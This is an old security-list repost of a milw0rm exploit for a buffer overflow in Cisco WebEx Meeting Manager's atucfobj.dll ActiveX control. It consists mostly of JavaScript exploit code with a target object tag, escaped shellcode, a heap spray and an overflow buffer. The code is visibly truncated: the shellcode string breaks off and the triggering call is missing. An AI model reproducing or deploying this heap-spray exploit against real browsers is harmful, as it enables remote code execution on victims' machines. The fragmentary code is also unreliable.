[EXPL] Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX (Exploit)

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX (Exploit)


A vulnerability in Cisco's WebEx ActiveX allows remote attackers to cause
it to overflow an internal buffer which in turn can be used to execute
arbitrary code, the following exploit code can be used to test your system
for the mentioned vulnerability.



<object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />

<script language=javascript>

// k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178"+

var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block += block;

var memory = new Array();

var i=0;
for (;i<1000;i++) memory[i] += block + shellcode;

memory[i] += shellcode;

var buf2;
for (var i=0; i<151; i++) buf2 += "X";

buf2 += unescape("%09%09%09%09");




# milw0rm.com [2008-08-10]


The information has been provided by <mailto:lists@xxxxxxxxxxx> Guido
The original article can be found at:


